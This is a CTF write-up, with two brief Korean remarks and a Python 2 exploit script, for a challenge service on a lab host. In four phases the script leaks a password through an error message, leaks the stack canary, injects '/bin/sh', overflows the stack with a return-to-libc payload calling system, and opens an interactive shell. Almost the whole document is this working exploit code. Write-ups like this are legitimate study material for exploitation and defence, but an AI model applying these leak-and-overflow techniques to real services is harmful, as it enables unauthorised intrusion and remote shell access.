별로 어렵지는 않았지만 argv[0] 주소를 찾기 위해 브루트 포싱을 했더니 조금 귀찮았던 문제.
xinetd 데몬으로 돌아가고 있어서 쉘따기가 참 쉬웠다.
# CTF writeup script (Python 2: print statements, str used as a byte buffer).
# Drives the challenge service over TCP in four phases: leak the password,
# leak the stack canary, send a return-to-libc style payload, then hand the
# socket to an interactive Telnet session.
# banner(), p32() and up32() come from the non-stdlib `hackutil` helper;
# presumably p32/up32 are 32-bit little-endian pack/unpack — verify in hackutil.
from hackutil import *
from socket import *
from time import *
from telnetlib import *

# Lab target from the writeup; private address, challenge-specific port.
HOST = '192.168.136.153'
PORT = 9880
#=======================================
# Challenge-specific addresses taken from the writeup (binary is not relocated).
system = 0x08048610   # address jumped to in the Phase 3 payload
freeadd = 0x0804b0E0  # address passed as the argument slot in the Phase 3 payload
#=======================================
banner()
print "===================[ Phase 1 : Password leak ]=================="
# First connection: 0x11d bytes of filler followed by a packed address
# (0x0804b060). The service's termination message then contains data read
# from that address, and the password is sliced out between "***: " and
# " terminated". Defender's note: an error path that echoes memory contents
# back to the client is the information leak the rest of the script builds on.
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
s.recv(1024)
s.send('A'*0x11d+p32(0x0804b060)+'\n')
sleep(0.1)
data = s.recv(1024)
passwd = data[data.find("***: ")+5:data.find(" terminated")]
print "[*] Found Password : "+passwd
print "============[ Phase 2 : Ready to RTL, Canary leak ]============="
# Second connection: authenticate with the leaked password, then walk the
# service menu (options 2, 1, 4). The fixed sleep()/recv(1024) pairs are
# timing-dependent; a slow or chatty service may desynchronise this sequence.
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
s.recv(1024)
s.send(passwd+'\n')
s.recv(1024)
s.recv(1024)
s.send('2\n')
sleep(0.2)
s.recv(1024)
s.send('1\n')
sleep(0.2)
s.recv(1024)
s.send('4\n')
sleep(0.2)
s.recv(1024)
# 0x15 bytes of filler; the reply later echoes "AAA\n" followed by bytes
# beyond the filler, which is where the canary is recovered from.
s.send('A'*0x15+'\n')
sleep(0.2)
s.recv(1024)
# Stores a NUL-terminated "/bin/sh" string in the service; its address is
# presumably `freeadd` used in Phase 3 — confirm against the binary.
s.send('/bin/sh\x00\n')
print '[*] Inject "/bin/sh"'
sleep(0.2)
s.recv(1024)
s.send('Mini\n')
sleep(0.2)
data = s.recv(1024)
# NOTE(review): the hex-encoded result is discarded, so this line has no effect.
data.encode('hex')
# Canary bytes are whatever sits between the echoed "AAA\n" and "Wow".
canary = data[data.find('AAA\n')+4:data.find('Wow')]
# Fewer than 4 bytes means leading NUL bytes were lost in the echo (the low
# canary byte is presumably 0x00); pad them back before unpacking.
if(len(canary)<4):
    canary = "\x00"*(4-len(canary)) + canary
canary = up32(canary)[0]
print "[*] Found canary : "+hex(canary)
print "==================[ Phase 3 : Attack with RTL ]================="
s.send('3\n')
sleep(0.2)
s.recv(1024)
# Frame layout as written: 0xd9 bytes to the canary slot, the leaked canary
# (so the stack protector check still passes), 0xC bytes to the saved return
# address, `system`, a 4-byte placeholder return address, then `freeadd` as
# the single argument. Defender's note: the canary only helps while it stays
# secret; the Phase 2 leak is what makes this layout viable.
payload = 'A'*0xd9+p32(canary)+"A"*0xC+p32(system)+"AAAA"+p32(freeadd)
print "[*] Length of Payload : "+str(len(payload))
s.send(payload+'\n')
print "[*] Payload Injected"
sleep(1)
s.recv(1024)
# Menu options 0 then 1 drive the service to return through the overwritten frame.
s.send('0\n')
sleep(0.2)
s.recv(1024)
s.send('1\n')
sleep(0.2)
s.recv(1024)
print "===================[ Phase 4 : Got the shell ]=================="
# Reuse the open socket inside telnetlib.Telnet for an interactive session.
t = Telnet()
t.sock = s
t.interact()